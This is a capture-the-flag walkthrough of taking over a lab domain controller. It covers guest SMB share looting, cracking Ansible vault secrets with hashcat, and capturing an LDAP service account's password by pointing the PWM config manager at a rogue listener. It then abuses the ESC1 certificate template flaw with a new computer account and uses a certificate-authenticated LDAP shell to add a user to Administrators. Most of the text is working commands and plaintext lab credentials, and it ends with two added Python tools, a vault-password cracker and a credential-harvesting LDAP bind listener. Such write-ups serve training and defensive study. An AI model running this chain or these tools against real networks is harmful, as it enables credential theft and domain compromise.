# Lessons Learned

- Always attempt password reuse and spraying
- If issues are encountered while trying to PtC with `certipy-ad auth`, try downgrading to `-ldap-shell`
  - `KDC_ERR_PADATA_TYPE_NOSUPP` means the KDC is not accepting PKINIT (typically the DC has no certificate usable for Kerberos authentication); `-ldap-shell` authenticates with the same certificate over LDAPS (Schannel) instead, so it does not depend on PKINIT
- There's still a lot that can be done with `-ldap-shell` (group membership changes, shadow credentials, RBCD)
- Closely scrutinize enrollment rights for cert templates
  - an enroller such as `Domain Computers` is as good as `Domain Users` whenever MachineAccountQuota is non-zero, because any user can then add a computer account and enrol as it

---

# After-Action Attack Sequence

- potential webservers on ports 80 and 8443
- port 8443 has PWM v2.0.3 bc96802e running
- `guest:` SMB access to the `Development` share provides several leads, all related to an Ansible playbook
  - base64 secure string in `.travis.yml`
  - `PWM/ansible_inventory` has WinRM creds
  - `PWM/templates/tomcat-users.xml.j2` has some creds
  - `PWM/defaults/main.yml` has some encrypted Ansible vaults
- use `ansible2john` on `main.yml`
  - create separate files for the vaults and crack with `hashcat -m 16900`
- create `users.txt` and `passwords.txt` and spray across SMB, LDAP, WinRM
  - nothing
- try passwords against the PWM interface on port 8443
  - one of the passwords works against the config manager and editor pages
- use the test LDAP profile feature on the config manager to reach out to a listener on Kali
  - this provided cleartext creds for `svc_ldap`
- confirm creds with `nxc smb`, enum SMB shares and local + domain users
- enum AS-REP roasting, Kerberoasting, and ADCS with creds
  - ADCS is in play but not the others
- run `certipy-ad find [...] -vulnerable -stdout`
  - looks like there is a path for ESC1 on the `CorpVPN` template
  - enrollment rights for the `CorpVPN` template include the `Domain Computers` group, and `svc_ldap` has `SeMachineAccountPrivilege` to add a computer account
- add `testcomp$` with `impacket-addcomputer`
- request cert for administrator as `testcomp$`
- attempt to PtC
  - failure with cert
  - downgrade to `-ldap-shell`
- add `svc_ldap` to the `administrators` group
- reconnect to the DC with `evil-winrm` as `svc_ldap`
  - `svc_ldap` is now in the `BUILTIN\Administrators` group

---

# Discover Ports & Services

- `ping` test
![[images/Pasted image 20260327194107.png]]
- `nmap` scan - light
![[images/Pasted image 20260327194133.png]]
- `nmap` scan - detailed
![[images/Pasted image 20260327194500.png]]
- convert with `xsltproc` and view html output
![[images/Pasted image 20260327194723.png]]
- Note: DC with ports 80 and 8443 open
- Port 8443 is a `tomcat` instance
- Add `authority.htb.corp` to `/etc/hosts`
- Note: 4hr clock skew (Kerberos tolerates 5 minutes by default, so sync the clock against the DC before any Kerberos-based step)

---

# Service Enum

## Port 80 (HTTP): IIS ver. 10.0

- default IIS page

## Port 8443 (HTTPS): PWM v2.0.3 bc96802e

- Very interesting
![[images/Pasted image 20260327200700.png]]
![[images/Pasted image 20260327200730.png]]
- Found a version: PWM v2.0.3 bc96802e
![[images/Pasted image 20260327201152.png]]
- Most recently `svc_pwm` logged in
![[images/Pasted image 20260327201516.png]]
- Looks like I found the associated github: https://github.com/wolfd/pwm?tab=readme-ov-file
![[images/Pasted image 20260327200933.png]]

## Port 445 (SMB)

### Null Auth

- both a blank username (` : `) and `guest` with an empty password work
![[images/Pasted image 20260327195028.png]]

### Password Policy

- Cannot enum
![[images/Pasted image 20260327195101.png]]

### Shares

- guest works but not the blank username
![[images/Pasted image 20260327195136.png]]
- the `Development` share looks interesting
- Connect to the `Development` share with `smbclient`

```bash
smbclient -U authority.htb/guest //10.129.229.56/Development
```

![[images/Pasted image 20260327195623.png]]
- `.travis.yml` has an interesting base64 string
![[images/Pasted image 20260327200000.png]]
  - this decodes as gibberish: Travis `secure:` values are encrypted with the repository's Travis public key, so the base64 wraps ciphertext that cannot be recovered offline
- so far we have potential users: `travis`, `svc_pwm`
- run `-M spider_plus`

```bash
nxc smb 10.129.229.56 -u "guest" -p "" -M spider_plus
```

![[images/Pasted image 20260327202654.png]]
- grab all files in the `Development` share
  - files dumped into `/home/jacob/.nxc/modules/nxc_spider_plus`

```bash
nxc smb 10.129.229.56 -u "guest" -p "" -M spider_plus -o DOWNLOAD_FLAG=True
```

- `PWM/ansible_inventory` has a WinRM password
![[images/Pasted image 20260328144326.png]]
- `PWM/templates/tomcat-users.xml.j2` also caught my eye
![[images/Pasted image 20260327203020.png]]

#### Crack Ansible Vaults

- `PWM/defaults/main.yml` has some interesting leads
![[images/Pasted image 20260327203241.png]]
- maybe we can crack these
- use `ansible2john`
  - break into three files, one `$ANSIBLE_VAULT` blob per file (`ansible2john` takes one vault per file)
![[images/Pasted image 20260328143443.png]]
  - extract hashes
![[images/Pasted image 20260328143538.png]]

```bash
# one file per vault blob; the file name becomes the username prefix on each hash line
/usr/bin/ansible2john ldap_admin_password pwm_admin_login pwm_admin_password | tee ansible_vault.hashes
# --user tells hashcat to ignore the "name:" prefix written by ansible2john
hashcat -m 16900 -O -a 0 -w 4 ansible_vault.hashes /opt/rockyou.txt --user
```

- all three vaults were encrypted with the same vault password
![[images/Pasted image 20260328144820.png]]
- install `ansible-core`, which includes `ansible-vault decrypt`

```bash
pipx install ansible-core
# each command prompts for the vault password recovered above and reads the ciphertext from stdin
cat ldap_admin_password | ansible-vault decrypt
cat pwm_admin_login | ansible-vault decrypt
cat pwm_admin_password | ansible-vault decrypt
```

![[images/Pasted image 20260328145347.png]]
- try to confirm a cred pair
![[images/Pasted image 20260328150417.png]]

#### Try passwords against PWM service on port 8443

- try to get into webpages on port 8443
> `pWm_@dm!N_!23` gets me into the config editor and manager
![[images/Pasted image 20260328150642.png]]
![[images/Pasted image 20260328150611.png]]
- open a listener on Kali and insert an LDAP URL directed to our Kali box
> `ldap://10.10.14.197:9001`
![[images/Pasted image 20260328151109.png]]
  - the "test LDAP profile" button makes PWM bind to the configured URL with its proxy account; because the URL is plain `ldap://` rather than `ldaps://`, the simple bind carries the DN and password in cleartext, which is what the listener captures
- we now have creds for `svc_ldap`
- confirm
![[images/Pasted image 20260328151319.png]]
- connect via `evil-winrm`
> not many privs
![[images/Pasted image 20260328151444.png]]
- recheck SMB, Kerberoasting, and ADCS

### Users

#### guest

- Cannot enum local users; limited domain users
![[images/Pasted image 20260327202145.png]]

#### `svc_ldap`

- Able to enum local and domain users
![[images/Pasted image 20260328151940.png]]

---

# AD Enum

## ASREP Roasting

```bash
# unauthenticated: only users without Kerberos pre-authentication return an AS-REP hash
nxc ldap 10.129.229.56 -d authority.htb -u users.txt -p '' --asreproast asrep.out
```

- Nothing without a better user list; try again later
![[images/Pasted image 20260327201818.png]]
- Try again as `svc_ldap`
![[images/Pasted image 20260328152124.png]]

## Kerberoasting

```bash
# single quotes keep the '!' in the password away from bash history expansion
nxc ldap 10.129.229.56 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -d authority.htb --kerberoasting kerb.out
```

![[images/Pasted image 20260328152031.png]]

## ADCS

```bash
nxc ldap 10.129.229.56 -d authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -M adcs
```

- We saw an ADCS dir in the `Development` share and user enum showed a `Cert Publishers` group
> maybe we cannot enum this yet because we don't have creds for a domain user
![[images/Pasted image 20260327201628.png]]
- try again as `svc_ldap`
![[images/Pasted image 20260328152207.png]]

---

# ADCS Attack

## Enumerate ADCS vulns

- add `authority.authority.htb` to `/etc/hosts` and run `certipy-ad find`
  - 37 cert templates
![[images/Pasted image 20260328152605.png]]
- view `20260328152408_Certipy.txt`
> looks spicy
![[images/Pasted image 20260328152543.png]]
- confirm the ESC1 vuln (enrollee supplies the subject, client-authentication EKU, no manager approval, and a low-privileged principal holds enrollment rights)

```bash
certipy-ad find -target authority.authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout
```

## Attempt A: ESC1 (`svc_ldap`)

- grab the SID for administrator
> `S-1-5-21-622327497-3269355298-2248959698-500`

```bash
certipy-ad account -target authority.authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -user 'administrator' read
```

- request cert
> getting an error

```bash
certipy-ad req -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -dc-ip '10.129.229.56' -target 'authority.authority.htb' -ca 'authority-ca' -template 'CorpVPN' -upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500'
```

![[images/Pasted image 20260328153515.png]]
- `svc_ldap` has no enrollment rights on `CorpVPN`, so the request is refused; the next attempt enrols from a principal that does

## Attempt B: ESC1 (fresh computer account)

- note that the enrollment rights are limited to the below (not including `domain users`)
![[images/Pasted image 20260328153618.png]]
- `svc_ldap` has the `SeMachineAccountPrivilege`
![[images/Pasted image 20260328153649.png]]
- enumerate how many machine accounts `svc_ldap` can create with `nxc ldap [...] -M maq` to check MachineAccountQuota (default is 10)
![[images/Pasted image 20260328154020.png]]
- use `addcomputer.py` to add a machine account

```bash
# impacket appends the trailing '$' to the computer name itself;
# remember the password set here, the certipy req below must use the same value
impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -method LDAPS -computer-name testcomp -computer-pass testpassword -dc-ip 10.129.229.56
```

![[images/Pasted image 20260328183621.png]]
- request a cert for administrator as `testcomp$`
```bash
# -p must match the -computer-pass used with impacket-addcomputer
certipy-ad req -u 'testcomp$@authority.htb' -p 'testpassword123!' -dc-ip '10.129.229.56' -target 'authority.authority.htb' -ca 'authority-ca' -template 'CorpVPN' -upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500' -dns authority.htb
```

![[images/Pasted image 20260328184259.png]]

### PtC: Simple `certipy-ad auth`

- try to authenticate as administrator with the cert

```bash
certipy-ad auth -dc-ip '10.129.229.56' -pfx administrator_authority.pfx
```

- getting an error when attempting to grab a TGT: `Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)`
![[images/Pasted image 20260328184536.png]]
- after googling this error, it looks like we should try `-ldap-shell`
  - the KDC rejects the PKINIT pre-authentication data because the DC has no certificate suitable for Kerberos authentication; the certificate is still valid for Schannel authentication over LDAPS, which is what `-ldap-shell` uses
![[images/Pasted image 20260328184708.png]]

### PtC: `-ldap-shell`

```bash
certipy-ad auth -dc-ip '10.129.229.56' -pfx administrator_authority.pfx -ldap-shell
```

![[images/Pasted image 20260328184851.png]]
- we can add `svc_ldap` to the `Administrators` group or perform a shadow creds attack on a user with admin privs
- below we will do the former (inside the ldap-shell prompt)

```
add_user_to_group svc_ldap administrators
```

- reconnect to the DC with `evil-winrm` as `svc_ldap` (a fresh logon is needed for the new group to appear in the token)
- bang! we are in `BUILTIN\Administrators`
![[images/Pasted image 20260328185326.png]]
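The vault-cracking step above leans on `ansible2john` and `hashcat -m 16900` as black boxes. The following is an added example (not code from the box, from Ansible or from hashcat) that shows what they actually do: it pulls every `!vault` block out of a `main.yml`-style variables file, splits the blob into its salt, HMAC and ciphertext, rebuilds the `$ansible$` hash line, and verifies candidate vault passwords the same way hashcat does, with PBKDF2-HMAC-SHA256 plus an HMAC check and no AES at all. The sample `main.yml`, the variable names and the vault password `example-vault-pass` are constructed for the example; the field order in `to_hashcat_line` (salt, HMAC, ciphertext) is assumed to match `ansible2john`.

```python
"""Extract Ansible Vault blobs from a variables file and test vault passwords
using only the standard library. Added example for this writeup.

Vault 1.1 / AES256 layout: the hex payload under the $ANSIBLE_VAULT header decodes
to  salt_hex \n hmac_hex \n ciphertext_hex.  Key material is
PBKDF2-HMAC-SHA256(password, salt, 10000 iterations, 80 bytes):
  key1 = [0:32]  AES-256-CTR key   key2 = [32:64]  HMAC key   iv = [64:80]
A password is right iff HMAC-SHA256(key2, ciphertext) == stored hmac, which is the
check hashcat -m 16900 performs, so the ciphertext never needs to be decrypted.
"""
import binascii
import hashlib
import hmac
import os
import re

VAULT_RE = re.compile(r"^(?P<name>\w+):[ \t]*!vault[ \t]*\|\n(?P<body>(?:[ \t]+\S+\n?)+)", re.M)


def extract_vaults(yaml_text):
    """Return {var_name: (salt, hmac_digest, ciphertext)} for every !vault block."""
    out = {}
    for m in VAULT_RE.finditer(yaml_text):
        lines = [ln.strip() for ln in m.group("body").splitlines() if ln.strip()]
        header, payload = lines[0], "".join(lines[1:])
        if not header.startswith("$ANSIBLE_VAULT;1.") or header.split(";")[2] != "AES256":
            raise ValueError(f"unsupported vault header: {header}")
        salt_hex, mac_hex, ct_hex = binascii.unhexlify(payload).split(b"\n")
        out[m.group("name")] = tuple(binascii.unhexlify(x) for x in (salt_hex, mac_hex, ct_hex))
    return out


def to_hashcat_line(name, salt, mac, ct):
    """Hash line for hashcat -m 16900 / john with the variable name as --user prefix.
    Field order salt, hmac, ciphertext is assumed to match ansible2john's output."""
    return f"{name}:$ansible$0*0*{salt.hex()}*{mac.hex()}*{ct.hex()}"


def derive(password, salt):
    """PBKDF2 as Ansible does it; returns (aes_key, hmac_key, iv)."""
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10000, dklen=80)
    return key[:32], key[32:64], key[64:]


def check_password(password, salt, mac, ct):
    """True iff `password` is the vault password for this blob (HMAC check only)."""
    _, hmac_key, _ = derive(password, salt)
    return hmac.compare_digest(hmac.new(hmac_key, ct, hashlib.sha256).digest(), mac)


def crack(vaults, wordlist):
    """Return {var_name: password} for every vault whose password is in `wordlist`."""
    found = {}
    for name, (salt, mac, ct) in vaults.items():
        for cand in wordlist:
            if check_password(cand, salt, mac, ct):
                found[name] = cand
                break
    return found


# --- constructed sample input -------------------------------------------------
def make_vault_var(name, password, secret_len=32):
    """Build a !vault block whose HMAC is valid for `password`. The ciphertext is
    random filler (it is never decrypted), which is enough to exercise the check."""
    salt, ct = os.urandom(32), os.urandom(secret_len)
    _, hmac_key, _ = derive(password, salt)
    mac = hmac.new(hmac_key, ct, hashlib.sha256).digest()
    payload = b"\n".join([salt.hex().encode(), mac.hex().encode(), ct.hex().encode()]).hex()
    rows = ["$ANSIBLE_VAULT;1.1;AES256"] + [payload[i:i + 80] for i in range(0, len(payload), 80)]
    return f"{name}: !vault |\n" + "\n".join("          " + r for r in rows) + "\n"


SAMPLE_MAIN_YML = ("---\npwm_run_dir: /opt/pwm\n"
                   + make_vault_var("pwm_admin_login", "example-vault-pass")
                   + make_vault_var("pwm_admin_password", "example-vault-pass")
                   + make_vault_var("ldap_admin_password", "example-vault-pass"))

if __name__ == "__main__":
    vaults = extract_vaults(SAMPLE_MAIN_YML)
    for n, fields in vaults.items():
        print(to_hashcat_line(n, *fields))
    print(crack(vaults, ["password", "123456", "example-vault-pass"]))
```

Pointing `extract_vaults` at the real `PWM/defaults/main.yml` gives the three hash lines in one go, without splitting the file by hand; `crack` is a few thousand PBKDF2 iterations per candidate, fine for a short spray but not a substitute for hashcat against rockyou.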
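The `svc_ldap` credentials were captured by pointing PWM's LDAP test at a bare listener. A plain `nc -lvnp` dumps raw BER, so the password has to be eyeballed out of the bytes. The following added example (not PWM, certipy or nxc code) is a listener that decodes the LDAP simple BindRequest (RFC 4511) and prints the bind DN and password, plus an encoder used to construct the sample message it is tested against. The DN `CN=svc_ldap,CN=Users,DC=example,DC=local`, the password `Sup3rS3cret!` and the default port 9001 are constructed for the example.

```python
"""Listener that decodes the cleartext simple BindRequest an LDAP client sends
when pointed at an attacker-controlled ldap:// URL. Added example for this writeup.

  LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp BindRequest }
  BindRequest ::= [APPLICATION 0] SEQUENCE { version INTEGER, name OCTET STRING,
                                             authentication simple [CONTEXT 0] OCTET STRING }
BER tags: SEQUENCE 0x30, INTEGER 0x02, OCTET STRING 0x04, BindRequest 0x60, simple 0x80.
Only ldap:// (no StartTLS/ldaps://) exposes the password this way.
"""
import socket


def _tlv(buf, pos):
    """Decode one BER TLV at buf[pos] -> (tag, value, next_pos); handles short-form
    and long-form (0x81 nn / 0x82 nn nn ...) definite lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_simple_bind(msg):
    """Return {'message_id','version','dn','password'} for a simple BindRequest,
    or None when the PDU is something else (SASL bind, unbind, search, ...)."""
    tag, body, _ = _tlv(msg, 0)
    if tag != 0x30:
        return None
    tag, mid, pos = _tlv(body, 0)
    if tag != 0x02:
        return None
    tag, bind, _ = _tlv(body, pos)
    if tag != 0x60:
        return None
    t1, ver, pos = _tlv(bind, 0)
    t2, dn, pos = _tlv(bind, pos)
    t3, auth, _ = _tlv(bind, pos)
    if (t1, t2, t3) != (0x02, 0x04, 0x80):
        return None
    return {"message_id": int.from_bytes(mid, "big"), "version": int.from_bytes(ver, "big"),
            "dn": dn.decode("utf-8", "replace"), "password": auth.decode("utf-8", "replace")}


def build_simple_bind(message_id, dn, password, version=3):
    """Encode the BindRequest a client such as PWM would send. Used to construct
    test input; message_id and version must be < 128, payloads < 65536 bytes."""
    def tlv(tag, value):
        n = len(value)
        if n < 0x80:
            hdr = bytes([tag, n])
        elif n < 0x100:
            hdr = bytes([tag, 0x81, n])
        else:
            hdr = bytes([tag, 0x82]) + n.to_bytes(2, "big")
        return hdr + value
    bind = tlv(0x02, bytes([version])) + tlv(0x04, dn.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, tlv(0x02, bytes([message_id])) + tlv(0x60, bind))


# Constructed sample: the bind an LDAP client would issue against our listener.
SAMPLE_BIND = build_simple_bind(1, "CN=svc_ldap,CN=Users,DC=example,DC=local", "Sup3rS3cret!")


def serve(host="0.0.0.0", port=9001, once=True):
    """Accept connections like `nc -lvnp`, but print the decoded DN and password."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        while True:
            conn, peer = srv.accept()
            with conn:
                data = conn.recv(65535)
                creds = parse_simple_bind(data) if len(data) > 2 else None
                if creds:
                    print(f"[+] {peer[0]} simple bind dn={creds['dn']!r} password={creds['password']!r}")
                else:
                    print(f"[-] {peer[0]} sent {len(data)} bytes that are not a simple bind")
            if once:
                break


if __name__ == "__main__":
    import sys
    serve(port=int(sys.argv[1]) if len(sys.argv) > 1 else 9001)
```

Run it with the port you put in the PWM LDAP URL (`python3 bind_listener.py 9001`), then press the test button in the config manager. If the client upgrades to TLS first, nothing readable arrives; that is the case to check for before concluding the proxy account is safe.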